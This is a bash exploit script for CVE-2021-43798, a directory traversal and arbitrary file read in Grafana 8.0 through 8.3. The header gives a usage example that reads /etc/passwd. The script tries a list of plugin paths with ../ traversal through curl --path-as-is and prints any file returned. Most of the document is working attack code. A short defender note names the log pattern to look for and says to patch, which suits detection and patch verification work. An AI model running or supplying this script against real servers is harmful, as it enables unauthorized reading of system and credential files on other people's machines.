#!/bin/bash
# Exploit Title: Grafana 8.0 - 8.3 - Directory Traversal and Arbitrary File Read
# Date: 20/12/2023
# Exploit Author: Brutus
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Ubuntu VERSION="20.04.2 LTS (Focal Fossa)"
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Usage ex: ./ExploitGrafana.sh -h http://domain.com:3000 -f /etc/passwd
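#######################################
# Print the usage text and abort.
# Globals:   none
# Arguments: none
# Outputs:   usage text on stderr (all lines, not just the first one)
# Returns:   never returns; exits with status 1
#######################################
show_help() {
  # Both options are mandatory (enforced after option parsing), so the
  # usage line no longer shows them in optional [] brackets.
  printf 'Usage: %s -h domain -f file_path\n' "$0" >&2
  printf ' -h (ex: http://novo-dominio:3000)\n' >&2
  printf ' -f (ex: /dir/file_to_read)\n' >&2
  exit 1
}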
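# Option parsing. Note that -h is the Grafana base URL here, not a help
# flag, and there is no --help: getopts only knows the short options below,
# so the old hint to run "$0 --help" could never work.
PARAMETER_DOMAIN=false
PARAMETER_FILE_PATH=false
# Leading ':' puts getopts in silent mode so missing-argument and unknown
# option errors are reported by the script (via show_help) instead of by bash.
while getopts ":h:f:" opt; do
  case "$opt" in
    h)
      DOMAIN=$OPTARG
      PARAMETER_DOMAIN=true
      ;;
    f)
      FILE_PATH=$OPTARG
      PARAMETER_FILE_PATH=true
      ;;
    :)
      echo "Option -$OPTARG requires an argument" >&2
      show_help
      ;;
    \?)
      echo "invalid Option: -$OPTARG" >&2
      show_help
      ;;
  esac
done
shift $((OPTIND - 1))
# Both options are required; show_help prints usage to stderr and exits 1.
if [ "$PARAMETER_DOMAIN" = false ] || [ "$PARAMETER_FILE_PATH" = false ]; then
  echo "The parameters -h (domain) and -f (file path) are mandatory." >&2
  show_help
fi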
# Plugin directory names the script tries, in order, as the base of the
# /public/plugins/<name>/ request. Order is preserved from the original
# one-entry-per-line list; the first one that answers 200 wins.
plugins=(
  alertlist annolist barchart bargauge candlestick
  cloudwatch dashlist elasticsearch gauge geomap
  gettingstarted grafana-azure-monitor-datasource graph heatmap histogram
  influxdb jaeger logs loki mssql
  mysql news nodeGraph opentsdb piechart
  pluginlist postgres prometheus stackdriver stat
  state-timeline status-histor table table-old tempo
  testdata text timeseries welcome zipkin
)
# Request loop: each plugin name is tried once as the traversal base and the
# loop stops at the first 200. `count` only reaches ${#plugins[@]} when no
# plugin succeeded, which is what the final message keys on.
#
# Defender note: the request shape produced here -- `../` segments directly
# under /public/plugins/<name>/ -- is the pattern to look for in Grafana and
# reverse-proxy access logs when hunting for CVE-2021-43798 attempts; the
# fix is to move to a patched release per the advisory linked in the header.
count=0
for plugin in "${plugins[@]}"; do
# `curl -v` with stderr merged into stdout, so $response holds the verbose
# transcript (request and response headers) followed by the body.
# --path-as-is stops curl from collapsing the ../ segments client-side.
# FILE_PATH is spliced into the URL as given, with no URL-encoding.
response=$(curl -v --path-as-is "${DOMAIN}/public/plugins/$plugin/../../../../../../../../../../../../../${FILE_PATH}" 2>&1)
# Success is judged solely on the literal "HTTP/1.1 200 OK" status line
# appearing anywhere in the transcript.
if echo "$response" | grep -q "HTTP/1.1 200 OK"; then
echo "Plugin $plugin Status code 200:"
# Prints the whole transcript (headers and body), not just the file contents.
echo "$response"
break
fi
count=$((count + 1))
done
# `break` above leaves count short of the array length, so this message is
# only printed when every plugin was tried without a 200.
if [ "$count" -eq "${#plugins[@]}" ]; then
echo "No plugins returned status code 200."
fi